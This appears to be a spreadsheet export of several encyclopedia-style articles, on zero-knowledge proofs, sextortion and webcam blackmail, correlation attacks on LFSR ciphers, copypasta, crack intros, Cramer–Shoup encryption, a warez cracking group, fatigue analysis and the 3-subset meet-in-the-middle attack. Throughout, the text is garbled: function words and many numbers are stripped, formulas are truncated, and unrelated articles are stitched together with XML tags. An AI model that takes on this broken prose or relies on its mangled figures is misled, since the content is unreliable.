arbitrarily low. short summary peggy proves know value (for example password). peggy victor agree prime {\displaystyle generator {\displaystyle multiplicative group field {\displaystyle \mathbb _{p}} peggy calculates value {\displaystyle y=g^{x}{\bmod {p}}} transfers value victor. following steps repeated (large) number times. peggy repeatedly picks random value {\displaystyle r\in u[0,p-2]} calculates {\displaystyle c=g^{r}{\bmod {p}}} transfers value {\displaystyle victor. victor asks peggy calculate transfer either value {\displaystyle (x+r){\bmod {(p-1)}}} value {\displaystyle first case victor verifies {\displaystyle (c\cdot y){\bmod {p}}\equiv g^{(x+r){\bmod {(p-1)}}}{\bmod {p}}} second case verifies {\displaystyle c\equiv g^{r}{\bmod {p}}} .the value {\displaystyle (x+r){\bmod {(}}p-1)} seen encrypted value {\displaystyle x{\bmod {(}}p-1)} {\displaystyle truly random, equally distributed zero {\displaystyle (p-2)} leak information {\displaystyle (see one-time pad). hamiltonian cycle large graph following scheme manuel blum.in scenario, peggy knows hamiltonian cycle large graph victor knows cycle (e.g., peggy generated revealed him.) finding hamiltonian cycle given large graph believed computationally infeasible, since corresponding decision version known np-complete. peggy prove knows cycle without simply revealing (perhaps victor interested buying wants verification first, maybe peggy knows information proving identity victor). show peggy knows hamiltonian cycle, victor play several rounds game. beginning round, peggy creates graph isomorphic (i.e. like except vertices different names). since trivial translate hamiltonian cycle isomorphic graphs known isomorphism, peggy knows hamiltonian cycle also must know peggy commits could using cryptographic commitment scheme. alternatively, could number vertices next, edge small piece paper, writes vertices edge joins. then puts pieces paper face table. purpose commitment peggy able change while, time, victor information victor randomly chooses questions peggy. either show isomorphism (see graph isomorphism problem), show hamiltonian cycle peggy asked show graphs isomorphic, first uncovers (e.g. turning pieces papers table) provides vertex translations victor verify indeed isomorphic. peggy asked prove knows hamiltonian cycle translates hamiltonian cycle onto uncovers edges hamiltonian cycle. this enough victor check indeed contain hamiltonian cycle.it important commitment graph victor verify, second case, cycle really made edges this done example, committing every edge lack thereof) separately. completeness peggy know hamiltonian cycle easily satisfy victor's demand either graph isomorphism producing (which committed first step) hamiltonian cycle (which construct applying isomorphism cycle zero-knowledge peggy's answers reveal original hamiltonian cycle each round, victor learn isomorphism hamiltonian cycle would need answers single discover cycle information remains unknown long peggy generate distinct every round. peggy know hamiltonian cycle somehow knew advance victor would round could cheat. example, peggy knew ahead time victor would hamiltonian cycle could generate hamiltonian cycle unrelated graph. similarly, peggy knew advance victor would isomorphism could simply generate isomorphic graph also know hamiltonian cycle). victor could simulate protocol (without peggy) knows see. therefore, victor gains information hamiltonian cycle information revealed round. soundness peggy know information, guess question victor generate either graph isomorphic hamiltonian cycle unrelated graph, since know hamiltonian cycle cannot both. with guesswork, chance fooling victor 2−n, number rounds. realistic purposes, infeasibly difficult defeat zero-knowledge proof reasonable number rounds way. variants zero-knowledge different variants zero-knowledge defined formalizing intuitive concept meant output simulator "looking like" execution real proof protocol following ways: speak perfect zero-knowledge distributions produced simulator proof protocol distributed exactly same. this instance case first example above. statistical zero-knowledge means distributions necessarily exactly same, statistically close, meaning statistical difference negligible function. speak computational zero-knowledge efficient algorithm distinguish distributions. zero knowledge types proof knowledge: knowledge hidden exponent like example shown above. pairing based cryptography: given f(x) f(y), without knowing possible compute f(x×y). witness indistinguishable proof: verifiers cannot know witness used producing proof. multi-party computation: party keep respective secret, together produce result. ring signature: outsiders idea used signing. applications authentication systems research zero-knowledge proofs motivated authentication systems party wants prove identity second party secret information (such password) want second party learn anything secret. this called "zero-knowledge proof knowledge". however, password typically small insufficiently random used many schemes zero-knowledge proofs knowledge. zero-knowledge password proof special kind zero-knowledge proof knowledge addresses limited size passwords.in april 2015, sigma protocol (one-out-of-many proofs) introduced. august 2021, cloudflare, american infrastructure security company decided one-out-of-many proofs mechanism private verification using vendor hardware. ethical behavior uses zero-knowledge proofs within cryptographic protocols enforce honest behavior maintaining privacy. roughly, idea force user prove, using zero-knowledge proof, behavior correct according protocol. because soundness, know user must really honestly order able provide valid proof. because zero knowledge, know user compromise privacy secrets process providing proof. nuclear disarmament 2016, princeton plasma physics laboratory princeton university demonstrated technique applicability future nuclear disarmament talks. would allow inspectors confirm whether object indeed nuclear weapon without recording, sharing revealing internal workings might secret. blockchains zero-knowledge proofs applied zerocoin zerocash protocols culminated birth zcoin (later rebranded firo 2020) zcash cryptocurrencies 2016. zerocoin built-in mixing model trust peers centralised mixing providers ensure anonymity. users transact base currency, cycle currency zerocoins. zerocash protocol similar model variant known non-interactive zero-knowledge proof) except obscure transaction amount zerocoin cannot. given significant restrictions transaction data zerocash network, zerocash less prone privacy timing attacks compared zerocoin. however, additional layer privacy cause potentially undetected hyperinflation zerocash supply fraudulent coins cannot tracked.in 2018, bulletproofs introduced. bulletproofs improvement non-interactive zero-knowledge proof trusted setup needed. later implemented mimblewimble protocol (where grin beam cryptocurrencies based monero cryptocurrency. 2019, firo implemented sigma protocol, improvement zerocoin protocol without trusted setup. year, firo introduced lelantus protocol, improvement sigma protocol former hides origin amount transaction. history zero-knowledge proofs first conceived 1985 shafi goldwasser, silvio micali, charles rackoff paper "the knowledge complexity interactive proof-systems". this paper introduced hierarchy interactive proof systems (see interactive proof system) conceived concept knowledge complexity, measurement amount knowledge proof transferred prover verifier. they also gave first zero-knowledge proof concrete problem, deciding quadratic nonresidues together paper lászló babai shlomo moran, landmark paper invented interactive proof systems, five authors first gödel prize 1993. words, goldwasser, micali, rackoff say: particular interest case additional knowledge essentially show [it] possible interactively prove number quadratic residue releasing additional knowledge. this surprising efficient algorithm deciding quadratic residuosity known factorization given. moreover, known proofs problem exhibit prime factorization this indicates adding interaction proving process, decrease amount knowledge must communicated order prove theorem. quadratic nonresidue problem co-np algorithm, lies intersection co-np. this also true several problems zero-knowledge proofs subsequently discovered, unpublished proof system oded goldreich verifying two-prime modulus blum integer.oded goldreich, silvio micali, wigderson took step further, showing that, assuming existence unbreakable encryption, create zero-knowledge proof system np-complete graph coloring problem three colors. since every problem efficiently reduced problem, means that, assumption, problems zero-knowledge proofs. reason assumption that, example, protocols require encryption. commonly cited sufficient condition existence unbreakable encryption existence one-way functions, conceivable physical means might also achieve this, also showed graph nonisomorphism problem, complement graph isomorphism problem, zero-knowledge proof. this problem co-np, currently known either practical class. more generally, russell impagliazzo moti yung well ben-or would show that, also assuming one-way functions unbreakable encryption, zero-knowledge proofs problems pspace, words, anything proved interactive proof system proved zero knowledge.not liking make unnecessary assumptions, many theorists sought eliminate necessity functions. done multi-prover interactive proof systems (see interactive proof system), multiple independent provers instead one, allowing verifier "cross-examine" provers isolation avoid misled. shown that, without intractability assumptions, languages zero-knowledge proofs system.it turns internet-like setting, multiple protocols executed concurrently, building zero-knowledge proofs challenging. line research investigating concurrent zero-knowledge proofs initiated work dwork, naor, sahai. particular development along lines development witness-indistinguishable proof protocols. property witness-indistinguishability related zero-knowledge, witness-indistinguishable protocols suffer problems concurrent execution.another variant zero-knowledge proofs non-interactive zero-knowledge proofs. blum, feldman, micali showed common random string shared prover verifier enough achieve computational zero-knowledge without requiring interaction. zero-knowledge proof protocols popular interactive non-interactive zero-knowledge proof (zk-snark) protocols broadly categorized following four categories: succinct non-interactive arguments knowledge (snark), scalable transparent argument knowledge (stark), verifiable polynomial delegation (vpd), succinct non-interactive arguments (snarg). list zero-knowledge proof protocols libraries provided along comparisons based transparency, universality, plausible post-quantum security, programming paradigm. transparent protocol require trusted setup uses public randomness. universal protocol require separate trusted setup circuit. finally, plausibly post-quantum protocol susceptible known attacks involving quantum algorithms. also references</t>
  </si>
  <si>
    <t>Sextortion</t>
  </si>
  <si>
    <t>sextortion portmanteau extortion) employs non-physical forms coercion extort sexual favors victim. sextortion refers broad category sexual exploitation abuse power means coercion, well category sexual exploitation threatened release sexual images information means coercion.as used describe abuse power, sextortion form corruption people entrusted power government officials, judges, educators, enforcement personnel, employers seek extort sexual favors exchange something within authority grant withhold. examples abuses power include: government officials request sexual favors obtain licenses permits, teachers trade good grades students, employers make providing sexual favors condition obtaining job.sextortion also refers form blackmail sexual information images used extort money sexual favors victim. social media text messages often source sexual material threatened means sharing others. example type sextortion people extorted nude image shared internet sexting. they later coerced giving money, performing sexual acts person extorting coerced posing performing sexually camera, thus producing hardcore pornography. this method blackmail also frequently used lgbt people keep true sexual orientation private.a video highlighting dangers sextortion released national crime agency educate people, especially given fact blackmail sexual nature cause humiliation sufficient extent cause victim take life, addition efforts educate public risks sextortion. webcam blackmail sextortion webcams also concern, especially webcams flirting cybersex. often involves cybercriminal posing someone else attractive person initiating communication sexual nature victim (about victims male). often, cybercriminal simply shows victim pre-recorded video performer cybersex webcam site sufficiently familiar with, messages victim points video performer appears typing keyboard, give illusion performer video messaging them. victim persuaded undress front webcam, also persuaded engage sexual behaviour, masturbation. video recorded cybercriminal, reveals true intent demands money services (such explicit images victim, cases online predation), threatening publicly release video video services like youtube send family members friends victim comply. sometimes threats make false allegations paedophilia victim made well. this known webcam blackmail. increase webcam blackmails reported, affects young old, male female alike. webcam blackmail also connected webcam trolling. history early term appears print 1950 california.since early 2009, institute responsible online cell-phone communication (iroc2.org) began warning public trend "sextortion" live events websites including www.sextortion.org. this trend grew based birth growth trend known "sexting" whereby compromising images videos shared individuals without real understanding short long term consequences sharing "private" content digital tools designed sharing. 2009, international association women judges (iawj), partnership association women judges bosnia herzegovina, philippine women judges association, tanzania women judges association, funding government netherlands, launched three-year program "stopping abuse power sexual exploitation: naming, shaming, ending sextortion." presentations sextortion made judges attending 2010 2012 biennial world conferences iawj ngos attending 2011 2012 meetings commission status women.there also scientific studies describing prevalence sextortion europe, etc. czech republic (2017).in china, cases sextortion part predatory lending students.in 2022, canadian centre child protection noted tripling cases compared previous years change away female victims sextored images towards young male victims sextorted money. incidents incidents sextortion prosecuted various criminal statutes, including extortion, bribery, breach trust, corruption, sexual coercion, sexual exploitation, sexual assault, child pornography, computer hacking wiretapping. anthony stancl wisconsin, received years prison february 2010 posed girl facebook trick male high school classmates sending nude cell phone photos, used extort homosexual sex. jonathan vance auburn, alabama, sentenced years prison april 2010 sending threatening e-mails facebook myspace extorting nude photos women three states. luis mijangos sentenced years prison september 2011 hacking dozens computers, stealing personal information demanding naked images female victims exchange releasing stolen information. forty-four victims isaac baichu, federal immigration officer york, sentenced 1+1⁄2 4+1⁄2 years prison july 2010 demanding 22-year-old colombian woman exchange green card. steve ellis, immigration adjudicator toronto, sentenced months jail july 2010 telling south korean woman would approve refugee claim exchange sex. michael ngilangwa, secondary school teacher tanzania, sentenced fine serve year prison june 2011 demanding sexual favors student exchange favorable exam results. christopher patrick gunn, montgomery, alabama indicted using fake facebook profiles extort nude photos videos underage girls numerous states. years federal prison convicted. 2010, police basque country spain arrested 24-year-old accused blackmailing woman online chatroom threatening distribute nude photographs webcam. 13-year-old amanda todd blackmailed online friend exposing breasts webcam. over next years sent screenshots people personally knew, resulting developing mental health issues, suffering bullying (both online real life) changing schools several times. committed suicide hanging october 2012, video chinese communist party official zhengfu woman part sextortion plot criminal gang. 2013, daniel perry committed suicide hours falling victim webcam blackmail. references external links institute responsible online cell-phone communication. www.sextortion.org frederick lane, cybertraps young, (chicago: upstream, 2011) gross, doug. "police: naked scammers seduce, blackmail web." cnn. february 2013. "cyber alerts parents kids beware ‘sextortion’." (archive) federal bureau investigation. february 2012. case ‘sextortion’ cons like ‘bieber ruse’ targeted minor girls." (archive) federal bureau investigation. february 2013. morris, kevin. "man strips camera "girlfriend," gets blackmailed." daily dot. 2013. "kids blackmailed online sex." cnn. september 2013. vives, ruben. "glendale sentenced years 'sextortion' case." angeles times. december 2013. "sextortion scam email campaign netted $143k bitcoin." thexyz. november 2018</t>
  </si>
  <si>
    <t>Correlation attack</t>
  </si>
  <si>
    <t>cryptography, correlation attacks class known plaintext attacks breaking stream ciphers whose keystream generated combining output several linear-feedback shift registers (lfsrs) using boolean function. correlation attacks exploit statistical weakness arises certain choices boolean function. cipher inherently insecure choice boolean function avoids weakness. essential consider susceptibility correlation attacks designing stream ciphers type. explanation correlation attacks possible significant correlation output state individual lfsr keystream generator output boolean function combines output state lfsrs. combination partial knowledge stream (which easily derived partial knowledge plaintext, simply xored together), allows attacker brute-force individual lfsr rest system separately. instance, keystream generator four 8-bit lfsrs combined produce keystream, registers correlated boolean function output, brute force first remaining three, total attack complexity 224. compared cost launching brute-force attack entire system, complexity 232, represents attack effort saving factor 256, substantial. second register correlated function, repeat process drop attack complexity effort saving factor 65028. sense, correlation attacks considered divide-and-conquer algorithms. example breaking geffe generator consider case geffe generator, consists three lfsrs: lfsr-1, lfsr-2 lfsr-3. denote outputs registers {\displaystyle x_{1}} {\displaystyle x_{2}} {\displaystyle x_{3}} respectively, boolean function combines three registers provide generator output given {\displaystyle f(x_{1},x_{2},x_{3})=(x_{1}\wedge x_{2})\oplus (\neg x_{1}\wedge x_{3})} (i.e. {\displaystyle x_{1}} {\displaystyle x_{2}} (not {\displaystyle x_{1}} {\displaystyle x_{3}} there possible values outputs three registers, value combining function shown table below: consider output third register, {\displaystyle x_{3}} table shows possible outputs {\displaystyle x_{3}} equal corresponding value generator output, {\displaystyle f(x_{1},x_{2},x_{3})} possible cases, {\displaystyle x_{3}=f(x_{1},x_{2},x_{3})} thus lfsr-3 correlated generator. this weakness exploit follows: suppose intercept cipher text {\displaystyle c_{1},c_{2},c_{3},\ldots ,c_{n}} plain text {\displaystyle p_{1},p_{2},p_{3},\ldots encrypted stream cipher using geffe generator keystream generator, i.e. {\displaystyle c_{i}=p_{i}\oplus f(x_{1i},x_{2i},x_{3i})} {\displaystyle i=1,2,3,\ldots {\displaystyle x_{1i}} output lfsr-1 time {\displaystyle etc. suppose know part plain text, e.g. know {\displaystyle p_{1},p_{2},p_{3},\ldots ,p_{32}} first bits plaintext (corresponding ascii characters text). this improbable seem: know plaintext valid file, instance, know first ascii characters must "&lt;xml". similarly, many file formats network protocols standard headers footers guessed easily. given intercepted {\displaystyle c_{1},c_{2},c_{3},\ldots ,c_{32}} known/guessed {\displaystyle p_{1},p_{2},p_{3},\ldots ,p_{32}} easily find {\displaystyle f(x_{1i},x_{2i},x_{3i})} {\displaystyle i=1,2,3,\ldots ,32} xoring together. know consecutive bits generator output. begin brute-force search space possible keys (initial values) lfsr-3 (assuming know tapped bits lfsr-3, assumption line kerckhoffs' principle). given keyspace, quickly generate first bits lfsr-3's output compare recovered bits entire generator's output. because established earlier correlation output lfsr-3 generator, know correctly guessed lfsr-3, approximately first bits lfsr-3 output match corresponding bits generator output. guessed incorrectly, expect roughly half, first bits sequences match. thus recover lfsr-3 independently keys lfsr-1 lfsr-2. stage reduced problem brute forcing system lfsrs problem brute forcing single lfsr system lfsrs. amount effort saved depends length lfsrs. realistic values, substantial saving make brute force attacks practical. observe table {\displaystyle x_{2}} also agrees generator output times correlation correlation {\displaystyle x_{2}} generator output. begin brute force attack lfsr-2 independently keys lfsr-1 lfsr-3, leaving lfsr-1 unbroken. thus, able break geffe generator much effort required brute force entirely independent lfsrs, meaning geffe generator weak generator never used generate stream cipher keystreams. note table {\displaystyle x_{1}} agrees generator output times correlation. cannot brute force lfsr-1 independently others: correct yield output agrees generator output time, average incorrect key. this represents ideal situation security perspective—the combining function {\displaystyle f(x_{1},x_{2},x_{3})} chosen correlation variable combining function's output close possible 50%. practice difficult find function achieves without sacrificing design criteria, e.g. period length, compromise necessary. clarifying statistical nature attack while example illustrates well relatively simple concepts behind correlation attacks, perhaps simplifies explanation precisely brute forcing individual lfsrs proceeds. make statement incorrectly guessed keys generate lfsr output agrees generator output roughly time, given random sequences given length, probability agreement sequences particular 0.5. however, specific individual incorrect keys well generate lfsr output agrees generator output less often exactly time. this particularly salient case lfsrs whose correlation generator especially strong; small enough correlations, certainly outside realm possibility incorrectly guessed also lead lfsr output agrees desired number bits generator output. thus, able find lfsr uniquely certainty. instead find number possible keys, although still significant breach cipher's security. had, say, megabyte known plain text, situation would substantially different. incorrect generate lfsr output agrees kilobytes generator output, likely generate output agrees much kilobytes generator output like correctly guessed would. rule, weaker correlation individual register generator output, known plain text required find register's high degree confidence. readers background probability theory able easily formalize argument obtain estimates length known plain text required given correlation using binomial distribution. higher order correlations definition correlations exploited example attack geffe generator examples called first order correlations: correlations value generator output individual lfsr. possible define higher order correlations addition these. instance, possible given boolean function strong correlations individual registers combines, significant correlation exist boolean function registers, e.g. {\displaystyle x_{1}\oplus x_{2}} this would example second order correlation. define third order correlations obvious way. higher order correlation attacks powerful single order correlation attacks, however effect subject "law limiting returns". table shows measure computational cost various attacks keystream generator consisting eight 8-bit lfsrs combined single boolean function. understanding calculation cost relatively straightforward: leftmost term represents size keyspace correlated generators, rightmost term represents size keyspace remaining generators. while higher order correlations lead powerful attacks, also difficult find, space available boolean functions correlate generator output increases number arguments function does. terminology boolean function {\displaystyle f(x_{1},\ldots ,x_{n})} variables said "m-th order correlation immune" "m-th order correlation immunity" integer significant correlation exists function's output boolean function inputs. example, boolean function first order second order correlations third order correlation exhibits order correlation immunity. obviously, higher correlation immunity makes function suitable keystream generator (although thing needs considered). siegenthaler showed correlation immunity boolean function algebraic degree variables satisfies {\displaystyle m+d\leq given input variables, means high algebraic degree restrict maximum possible correlation immunity. furthermore, function balanced {\displaystyle m\leq n-1} follows impossible function variables n-th order correlation immune. this also follows fact function written using reed-muller basis combination xors input functions. cipher design implications given possibly extreme severity correlation attack's impact stream cipher's security, considered essential test candidate boolean combination function correlation immunity deciding stream cipher. however, important note high correlation immunity necessary, sufficient condition boolean function appropriate keystream generator. there issues consider, e.g. whether function balanced whether outputs many roughly many possible inputs considered. research conducted methods easily generating boolean functions given size guaranteed least particular order correlation immunity. this research uncovered links correlation immune boolean functions error correcting codes. also topics cryptography references bruce schneier. applied cryptography: protocols, algorithms source code second edition. john wiley sons, inc. 1996. isbn 0-471-12845-7. page section 16.4: stream ciphers using lfsrs. external links online database boolean functions allows visitors search database boolean factors several ways, including correlation immunity.</t>
  </si>
  <si>
    <t>Copypasta</t>
  </si>
  <si>
    <t>copypasta block text copied pasted across internet individuals online forums social networking websites. copypastas said similar spam often used annoy users disrupt online discourse. history word "copypasta" first used usenet groups 2006. etymology term "copypasta" derived computer term "copy/paste", traced back anonymous 4chan thread 2006. examples navy seal navy seal copypasta lengthy, comically written, aggressive attack paragraph "kiddo", written voice stereotypical "tough guy", listing absurd accomplishments "over confirmed kills" "trained gorilla [sic] warfare". this copypasta often reposted humorous overreaction insult thought originated post 4chan message board november 2010.this copypasta manifesto perpetrator christchurch mosque shootings. movie movie copypasta started 2013 users posted entire script onto websites reddit tumblr. popularized edits film first uploaded youtube late 2016. drive into deep left field castellanos" august 2020, major league baseball game cincinnati reds kansas city royals, reds broadcaster thom brennaman uttered homophobic slur mic. later broadcast, brennaman apologized listeners. mid-apology, nick castellanos home run, brennaman broke apology deliver play-by-play. brennaman said, pride think faith, there's drive deep left field castellanos, home run. make ballgame." moment became internet meme copypasta. espn's pablo torre later said "was like listening band play titanic sinking. except band also somehow iceberg." also creepypasta, brief, user-generated, paranormal stories intended scare readers chain letter faxlore, similar content circulated machine know your meme, website video series researches documents history copypastas similar content running gag, recurring joke snowclone, cliché phrasal template used recognized multiple variants shitposting, practice posting intentionally low-quality provocative content troll solicit reactions others references</t>
  </si>
  <si>
    <t>Crack intro</t>
  </si>
  <si>
    <t>crack intro, also known cracktro, loader, intro, small introduction sequence added cracked software. aims inform user "cracking crew" individual cracker removed software's copy protection distributed crack.they first appeared apple computer late 1970s early 1980s, spectrum, commodore amstrad games distributed around world bulletin board systems (bbses) floppy disk copying. 1985, reviewing commercially available isepic cartridge adds custom crack intro memory dumps commodore software, ahoy! wrote intros tradition true hacker". early crack intros resemble graffiti many ways, although invaded private sphere public space.as time went crack intros became medium demonstrate purported superiority cracking group. such intros grew complex, sometimes exceeding size complexity software itself. crack intros became sophisticated advanced systems commodore amiga, atari clone systems sound cards. these intros feature big, colourful effects, music, scrollers.cracking groups would intros gain credit cracking, advertise bbses, greet friends, gain recognition. messages frequently vulgar nature, occasions made threats violence software companies members rival crack-group.crack-intro programming eventually became form right, people started coding intros without attaching crack show well could program. this practice evolved demoscene.crack intros small software created software crackers keygens patches remove protection commercial applications often chiptunes form background music. these chiptunes still accessible downloadable musicdisks musicpacks. also chiptune demoscene replay: history video games book describes dutch demo making major influence video games 1980s. warez scene references further reading reunanen, markku; wasiak, patryk; botz, daniel (2015). "crack intros: piracy, creativity communication". international journal communication. 798–817. issn 1932-8036. patryk wasiak, ‘illegal guys’. history digital subcultures europe 1980s, zeithistorische forschungen/studies contemporary history, online-ausgabe, (2012), borzyskowski, george (november 1996). "the hacker demo scene cultural artifacts" (pdf). curtin university technology. read online: http://www.scheib.net/play/demos/what/borzyskowski/. hastik, canan; steinmetz, arnd (2012a): demoscene artists community. bours, patrick; humm, bernhard; loew, robert; stengel, ingo; walsh, paul (eds.): proceedings cerc 2012, 43–48. driscoll, kevin; diaz, joshua (2009): endless loop: brief history chiptunes. transformative works cultures 2009. reunanen, markku (2014-04-15). "how those crackers became demosceners". widerscreen (1–2). "demoszene: hollywood kilobyte" (mp4). elektrische reporter german). 2008-12-05. external links world crackintros large collection cracktros native "prg" file format (supported emulators) defacto2 hundreds cracktros, loaders installers amiga music preservation thousands cracktros tracker formats. chiptune.com chiptune dedicated website containing thousands chiptunes amiga formats. website emulates amiga workbench 1.3. amiga cracktro marathron large back-to-back collection amiga cracktros. docsnyderspage.com hundreds crack intros re-coded web.</t>
  </si>
  <si>
    <t>Cramer–Shoup cryptosystem</t>
  </si>
  <si>
    <t>cramer–shoup system asymmetric encryption algorithm, first efficient scheme proven secure adaptive chosen ciphertext attack using standard cryptographic assumptions. security based computational intractability (widely assumed, proved) decisional diffie–hellman assumption. developed ronald cramer victor shoup 1998, extension elgamal cryptosystem. contrast elgamal, extremely malleable, cramer–shoup adds elements ensure non-malleability even resourceful attacker. this non-malleability achieved universal one-way hash function additional computations, resulting ciphertext twice large elgamal. adaptive chosen ciphertext attacks definition security achieved cramer–shoup formally termed "indistinguishability adaptive chosen ciphertext attack" (ind-cca2). this security definition currently strongest definition known public cryptosystem: assumes attacker access decryption oracle decrypt ciphertext using scheme's secret decryption key. "adaptive" component security definition means attacker access decryption oracle observes specific target ciphertext attack (though prohibited using oracle simply decrypt target ciphertext). weaker notion security non-adaptive chosen ciphertext attacks (ind-cca1) allows attacker access decryption oracle observing target ciphertext. though well known many widely used cryptosystems insecure attacker, many years system designers considered attack impractical largely theoretical interest. this began change late 1990s, particularly daniel bleichenbacher demonstrated practical adaptive chosen ciphertext attack servers using form encryption.cramer–shoup first encryption scheme provide security adaptive chosen ciphertext attack. naor–yung, rackoff–simon, dolev–dwork–naor proposed provably secure conversions standard (ind-cpa) schemes ind-cca1 ind-cca2 schemes. these techniques secure standard cryptographic assumptions (without random oracles), however rely complex zero-knowledge proof techniques, inefficient terms computational cost ciphertext size. variety approaches, including bellare/rogaway's oaep fujisaki–okamoto achieve efficient constructions using mathematical abstraction known random oracle. unfortunately, implement schemes practice requires substitution practical function (e.g., cryptographic hash function) place random oracle. growing body evidence suggests insecurity approach, although practical attacks demonstrated deployed schemes. cryptosystem cramer–shoup consists three algorithms: generator, encryption algorithm, decryption algorithm. generation alice generates efficient description cyclic group {\displaystyle order {\displaystyle distinct, random generators {\displaystyle g_{1},g_{2}} alice chooses five random values {\displaystyle ({x}_{1},{x}_{2},{y}_{1},{y}_{2},z)} {\displaystyle \{0,\ldots ,q-1\}} alice computes {\displaystyle c={g}_{1}^{x_{1}}g_{2}^{x_{2}},d={g}_{1}^{y_{1}}g_{2}^{y_{2}},h={g}_{1}^{z}} alice publishes {\displaystyle (c,d,h)} along description {\displaystyle g,q,g_{1},g_{2}} public key. alice retains {\displaystyle (x_{1},x_{2},y_{1},y_{2},z)} secret key. group shared users system. encryption encrypt message {\displaystyle alice public {\displaystyle (g,q,g_{1},g_{2},c,d,h)} converts {\displaystyle element {\displaystyle chooses random {\displaystyle {\displaystyle \{0,\ldots ,q-1\}} calculates: {\displaystyle u_{1}={g}_{1}^{k},u_{2}={g}_{2}^{k}} {\displaystyle e=h^{k}m} {\displaystyle \alpha =h(u_{1},u_{2},e)} universal one-way hash function collision-resistant cryptographic hash function, stronger requirement). {\displaystyle v=c^{k}d^{k\alpha sends ciphertext {\displaystyle (u_{1},u_{2},e,v)} alice. decryption decrypt ciphertext {\displaystyle (u_{1},u_{2},e,v)} alice's secret {\displaystyle (x_{1},x_{2},y_{1},y_{2},z)} alice computes {\displaystyle \alpha =h(u_{1},u_{2},e)\,} verifies {\displaystyle {u}_{1}^{x_{1}}u_{2}^{x_{2}}({u}_{1}^{y_{1}}u_{2}^{y_{2}})^{\alpha }=v\,} test fails, decryption aborted output rejected. otherwise, alice computes plaintext {\displaystyle m=e/({u}_{1}^{z})\,} .the decryption stage correctly decrypts properly-formed ciphertext, since {\displaystyle {u}_{1}^{z}={g}_{1}^{kz}=h^{k}\,} {\displaystyle m=e/h^{k}.\,} space possible messages larger size {\displaystyle cramer–shoup used hybrid cryptosystem improve efficiency long messages. references ronald cramer victor shoup. practical public cryptosystem provably secure adaptive chosen ciphertext attack." proceedings crypto 1998, lncs 1462, 13ff (ps,pdf) implementations cramer–shoup emacs lisp java 1998 vintage news coverage cramer shoup's publication wired news bruce schneier's crypto-gram ronald cramer victor shoup: "universal hash proofs paradigm chosen ciphertext secure public encryption." proceedings eurocrypt 2002, lncs 2332, 45–64. full version (pdf)</t>
  </si>
  <si>
    <t>International Network of Crackers</t>
  </si>
  <si>
    <t>international network crackers (inc) premier cracking/releasing warez groups late 1980s early 1990s. formation result merger several cracking groups, including union, based texas, miami cracking machine (mcm), based florida. founder mcm, went pseudonym line noise, continued manage 1992. following departure group, cool hand cracksmith took over. there years group seemed dominant "warez" scene. internal conflicts lack interest upper management entered picture things began decline. when cool hand cracksmith disappeared, remaining members unable hold things together.the real identities members never fully uncovered, reported founding members, line noise (neil), cracksmith (drew), cool hand (joe) left scene. releases aggressively declined people within scene generally felt lost edge. during one-year period, went gaming software release group barely memorable. some best games released period stiff competition groups like flt, thg, razor 1911. early 1994, completely disappeared warez scene.among biggest rivals competitors group's existence humble guys. during period groups using means possible (including credit card fraud, lies, anything else) beat them, always maintained moral high ground. worst ever "leak" game humble guys could steal credit. while unknown game infected trojan searched modem dialed 9-1-1. several humble guys members visited police discovered fooled. references</t>
  </si>
  <si>
    <t>Critical plane analysis</t>
  </si>
  <si>
    <t>critical plane analysis refers analysis stresses strains experienced particular plane material, well identification plane likely experience extreme damage. critical plane analysis widely used engineering account effects cyclic, multiaxial load histories fatigue life materials structures. when structure cyclic multiaxial loading, necessary multiaxial fatigue criteria account multiaxial loading. cyclic multiaxial loading nonproportional mandatory proper multiaxial fatigue criteria. multiaxial criteria based critical plane method effective criteria.for plane stress case, orientation plane specified angle plane, stresses strains acting plane computed mohr's circle. general case, orientation specified unit normal vector plane, associated stresses strains computed tensor coordinate transformation law. chief advantage critical plane analysis earlier approaches like sines rule, like correlation maximum principal stress strain energy density, ability account damage specific material planes. this means cases involving multiple out-of-phase load inputs, crack closure treated high accuracy. additionally, critical plane analysis offers flexibility adapt wide range materials. critical plane models metals polymers widely used. history modern procedures critical plane analysis trace back research published 1973 brown miller observed fatigue life multiaxial conditions governed experience plane receiving damage, tension shear loads critical plane must considered. references external links book multiaxial fatigue darrell socie gary marquis) class notes multiaxial fatigue fatemi) multiaxial fatigue theory msc.fatigue' help) metal fe-based fatigue analysis software: ncode designlife hbm) metal fe-based fatigue analysis software: fe-safe dassault systemes simulia) metal fe-based fatigue analysis software: femfat magna powertrain) metal fe-based fatigue analysis software: msc.fatigue software) metal fe-based fatigue analysis software: virtual.lab durability lms) metal fe-based fatigue analysis software: durability siemens) metal fe-based fatigue analysis software: winlife steinbeis-transferzentrum) metal fe-based fatigue analysis software: fatiga fatec engineering) rubber fatigue analysis software: endurica endurica llc)</t>
  </si>
  <si>
    <t>3-subset meet-in-the-middle attack</t>
  </si>
  <si>
    <t>3-subset meet-in-the-middle (hereafter shortened mitm) attack variant generic meet-in-the-middle attack, used cryptology hash block cipher cryptanalysis. 3-subset variant opens possibility apply mitm attacks ciphers, trivial divide keybits independent key-spaces, required mitm attack. 3-subset variant relaxes restriction key-spaces independent, moving intersecting parts keyspaces subset, contains keybits common key-spaces. history original mitm attack first suggested article diffie hellman 1977, discussed cryptanalytic properties des. they argued keysize small, reapplying multiple times different keys could solution key-size; however, advised using double-des suggested triple-des minimum, mitm attacks (double-des susceptible mitm attack, could easily split subciphers (the first second encryption) keys independent another, thus allowing basic mitm attack reduces computational complexity {\displaystyle 2^{112}(=2^{2\times 56})} {\displaystyle 2^{57}(=2\times 2^{56})} many variations emerged, since diffie hellman suggested mitm attacks. these variations either makes mitm attacks effective, allows used situations, basic variant cannot. 3-subset variant shown bogdanov rechberger 2011, shown cryptanalysis ciphers, lightweight block-cipher family ktantan. procedure general mitm attacks, attack split phases: key-reducing phase key-verification phase. first phase, domain key-candidates reduced, applying mitm attack. second phase, found key-candidates tested another plain-/ciphertext pair filter away wrong key(s). key-reducing phase key-reducing phase, attacked cipher split subciphers, {\displaystyle {\displaystyle independent keybits, normal mitm attacks. instead conform limitation keybits subciphers independent, 3-subset attack allows splitting cipher subciphers, bits allowed used subciphers. this done splitting three subsets instead, namely: {\displaystyle a_{0}} keybits subciphers common. {\displaystyle a_{1}} keybits distinct first subcipher, {\displaystyle {\displaystyle a_{2}} keybits distinct second subcipher, {\displaystyle carry mitm attack, subsets bruteforced individually, according procedure below: guess {\displaystyle a_{0}} calculate intermediate value {\displaystyle plaintext, key-bit combinations {\displaystyle a_{1}} calculate intermediate value {\displaystyle key-bit combinations {\displaystyle a_{2}} compare {\displaystyle {\displaystyle when match. store key-candidate. key-testing phase each key-candidate found 